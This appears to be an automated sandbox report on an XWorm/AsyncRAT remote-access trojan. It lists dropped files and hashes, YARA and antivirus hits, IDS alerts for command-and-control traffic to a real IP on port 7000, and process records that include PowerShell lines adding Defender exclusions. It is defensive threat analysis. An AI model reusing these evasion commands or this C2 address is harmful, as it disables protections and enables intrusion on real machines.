                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.@g.................h.............. ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....f... ...h.................. ..`.rsrc................j..............@..@.reloc...............p..............@..B........................H.......Pc..(#......!....&..2=............................................(....*.r...p*. .O..*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r...p*. =...*.r>..p*. ....*.rz..p*. ..5.*.r...p*. S2C.*.r...p*. ....*..(&...*.r ..p*. ..!.*.r\..p*.r...p*.r...p*. .vc.*.r...p*. ;%A.*.rL..p*. ..W.*.r...p*. ..'.*.0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0...........(".
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 2 18:10:45 2025, mtime=Thu Jan 2 18:10:46 2025, atime=Thu Jan 2 18:10:45 2025, length=69632, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):763
                                                                  Entropy (8bit):5.1171238187673564
                                                                  Encrypted:false
                                                                  SSDEEP:12:8XoP24dYChVq5lZY//tZmeLcQSlaRjAHNHk3Lm6mV:86y46S24cpwlAybhm
                                                                  MD5:97F546863204A6F808C8ABD3F9AA05D1
                                                                  SHA1:0347622EB14C7215A665476A16B3ADDA99DC2F46
                                                                  SHA-256:CC898FD6F54E0AB12D43DC4926EE4EA843D4694BCAC9FDBB283F1D04CD00ED47
                                                                  SHA-512:910BCC4DA9857DBD5758814C53BC7816992E13635F103DBD4187C9EB6930F31C2FEE963D9DA9584D31853499F79856504C3BE94DC57F5EC8B3C94EC5715E1CB9
                                                                  Malicious:false
                                                                  Preview:L..................F.... .....|.J]...G!.J]....|.J]..........................v.:..DG..Yr?.D..U..k0.&...&.........5q..._Hj.J].....J]......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N"ZT............................c..A.p.p.D.a.t.a...B.V.1....."ZW...Roaming.@......EW)N"ZX...........................>...R.o.a.m.i.n.g.....b.2....."ZW. .svchost.exe.H......"ZW."ZW...........................z.F.s.v.c.h.o.s.t...e.x.e.......X...............-.......W.............<8.....C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......061544...........hT..CrF.f4... .<..V=....+...E...hT..CrF.f4... .<..V=....+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.975187764500989
                                                                  Encrypted:false
                                                                  SSDEEP:1536:WT/juex6LhRZniVHnXSe8PmWbT04YzNgWIOp6yF1R9Oc7uu:WjjuIpVHnXSe2xbTWqOlz9Ocau
                                                                  MD5:6D378D7AF71086710318CDDA873D9348
                                                                  SHA1:3D55D27FB66361254D954060904E5EE0B6CD13C1
                                                                  SHA-256:531640277D1DC2206A49F3A69D412CFECECC97251247917403A69ABF982E492B
                                                                  SHA-512:696B94E8D8FBAB051C1DB635765DAE200CAAA631850950D4B39F0AB92B4968EEDB3B86888F2E9A54CBA6DB7667A5FF4087B25F97E6C999A1464E2AD7B87DE131
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag............................>%... ...@....@.. ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ %......H........b..........&.....................................................(....*.r...p*. .=l.*..(....*.r!..p*. ^...*.s.........s.........s.........s.........*.r...p*. S...*.r...p*. .s..*.rr..p*. ...*.r...p*. ..Q.*.r>..p*. ....*..((...*.rr..p*. x.`.*.r...p*. FwB.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rN..p*. .x!.*.r...p*. *p{.*.r...p*.r...p*. Q...*.r...p*.rL..p*. ....*.r...p*.r...p*.r..
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.206202393458702
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:file.exe
                                                                  File size:14'791'680 bytes
                                                                  MD5:f33eeceda472b6cc6b7880dbba4f4d1f
                                                                  SHA1:f7aadb89b32d89f593b4c1064d29209496468460
                                                                  SHA256:beeebb1db3f480c09137138d9d8e1cc9b114a927deb4b917d7c46e4e387f4a2a
                                                                  SHA512:d552017090cf1b77d8ad4f9fe91cc8ad8a7ca915d2ae446c31102990119b4923df0b666e7e39df8f55152c8308f926e8eb6dd4289e870f927e4076ec1bd46387
                                                                  SSDEEP:49152:UMyMimd0NL7CIHwpUd+PP5JHyernS0UMVmGfJK1jxHbDW:U4d0NPCcwplddqxHbD
                                                                  TLSH:BBE666CAC3217BE79A3D98E3878BD682C5CE81FF435BA54E843D5968974584C4B3E702
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag............................>.... ........@.. ....................... ............@................................
                                                                  Icon Hash:90cececece8e8eb0
                                                                  Entrypoint:0x121c83e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6741F29F [Sat Nov 23 15:19:59 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe1c7ec | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe1e000 | 0x4e6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe20000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe1a844 | 0xe1aa00 | 153c559cd90b3bc04be3a124e64dccf7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe1e000 | 0x4e6 | 0x600 | 539dd67540ec84803a4976408ed92844 | False | 0.3782552083333333 | data | 3.7648609320544746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe20000 | 0xc | 0x200 | 6b92694aaa20489f5314ed0f16761bcf | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe1e0a0 | 0x25c | data | | | 0.4586092715231788
RT_MANIFEST | 0xe1e2fc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-02T20:12:05.630002+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:05.659317+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:12.238570+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:12.238570+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:17.745407+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:17.747411+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:29.859822+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:29.966060+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:41.956314+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:41.959243+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:42.265305+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:42.265305+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:51.510194+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:51.511184+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 20:10:50.260621071 CET | 49702 | 80 | 192.168.2.10 | 208.95.112.1
Jan 2, 2025 20:10:50.265445948 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.10
Jan 2, 2025 20:10:50.265567064 CET | 49702 | 80 | 192.168.2.10 | 208.95.112.1
Jan 2, 2025 20:10:50.265943050 CET | 49702 | 80 | 192.168.2.10 | 208.95.112.1
Jan 2, 2025 20:10:50.270747900 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.10
Jan 2, 2025 20:10:50.724276066 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.10
Jan 2, 2025 20:10:50.769661903 CET | 49702 | 80 | 192.168.2.10 | 208.95.112.1
Jan 2, 2025 20:11:27.580049992 CET | 54533 | 53 | 192.168.2.10 | 162.159.36.2
Jan 2, 2025 20:11:27.587382078 CET | 53 | 54533 | 162.159.36.2 | 192.168.2.10
Jan 2, 2025 20:11:27.587500095 CET | 54533 | 53 | 192.168.2.10 | 162.159.36.2
Jan 2, 2025 20:11:27.595057964 CET | 53 | 54533 | 162.159.36.2 | 192.168.2.10
Jan 2, 2025 20:11:28.036984921 CET | 54533 | 53 | 192.168.2.10 | 162.159.36.2
Jan 2, 2025 20:11:28.045126915 CET | 53 | 54533 | 162.159.36.2 | 192.168.2.10
Jan 2, 2025 20:11:28.045209885 CET | 54533 | 53 | 192.168.2.10 | 162.159.36.2
Jan 2, 2025 20:11:49.377527952 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.10
Jan 2, 2025 20:11:49.377616882 CET | 49702 | 80 | 192.168.2.10 | 208.95.112.1
Jan 2, 2025 20:11:53.094321012 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:11:53.099169016 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:11:53.099303961 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:11:53.165153027 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:11:53.170053959 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:05.273448944 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:05.278203964 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:05.630002022 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:05.659317017 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:05.664166927 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:12.238569975 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:12.285406113 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:17.379580975 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:17.384360075 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:17.745407104 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:17.747411013 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:17.752163887 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:29.489404917 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:29.494272947 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:29.859822035 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:29.910429955 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:29.966059923 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:29.970885038 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:30.739794016 CET | 49702 | 80 | 192.168.2.10 | 208.95.112.1
Jan 2, 2025 20:12:30.744574070 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.10
Jan 2, 2025 20:12:41.598530054 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:41.603468895 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:41.956314087 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:41.959243059 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:41.967468977 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:42.265305042 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:42.316684961 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:50.895358086 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:50.900238991 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:51.510194063 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Jan 2, 2025 20:12:51.511183977 CET | 54562 | 7000 | 192.168.2.10 | 45.141.26.134
Jan 2, 2025 20:12:51.517936945 CET | 7000 | 54562 | 45.141.26.134 | 192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 20:10:50.086584091 CET | 55460 | 53 | 192.168.2.10 | 1.1.1.1
Jan 2, 2025 20:10:50.253070116 CET | 53 | 55460 | 1.1.1.1 | 192.168.2.10
Jan 2, 2025 20:11:27.579309940 CET | 53 | 49989 | 162.159.36.2 | 192.168.2.10
Jan 2, 2025 20:11:28.065664053 CET | 53 | 56657 | 1.1.1.1 | 192.168.2.10

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 20:10:50.086584091 CET | 192.168.2.10 | 1.1.1.1 | 0xffe | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 20:10:50.253070116 CET | 1.1.1.1 | 192.168.2.10 | 0xffe | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                  • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49702 | 208.95.112.1 | 80 | 512 | C:\Users\user\AppData\Roaming\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 20:10:50.265943050 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 2, 2025 20:10:50.724276066 CET | 175 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 19:10:50 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 51
X-Rl: 42
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
Target ID: 0
Start time: 14:10:43
Start date: 02/01/2025
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x680000
File size: 14'791'680 bytes
MD5 hash: F33EECEDA472B6CC6B7880DBBA4F4D1F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 14:10:45
Start date: 02/01/2025
Path: C:\Users\user\AppData\Roaming\All function.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\All function.exe"
Imagebase: 0x890000
File size: 14'709'248 bytes
MD5 hash: A23632476984A0D607DBF76B1096432F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 83%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 14:10:45
Start date: 02/01/2025
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0x950000
File size: 69'632 bytes
MD5 hash: 6D378D7AF71086710318CDDA873D9348
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 4
Start time: 14:10:46
Start date: 02/01/2025
Path: C:\Users\user\AppData\Roaming\ALL slumzick.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\ALL slumzick.exe"
Imagebase: 0x7ff6ba530000
File size: 14'620'672 bytes
MD5 hash: 735BD603CC2800BDB3972CC2B561E86A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 47%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 5
Start time: 14:10:46
Start date: 02/01/2025
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0x110000
File size: 69'632 bytes
MD5 hash: 6D378D7AF71086710318CDDA873D9348
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                  Target ID:6
                                                                  Start time:14:10:49
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:14:10:49
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:14:10:57
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:14:10:57
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:14:11:10
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:14:11:10
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:14:11:28
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:14:11:28
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
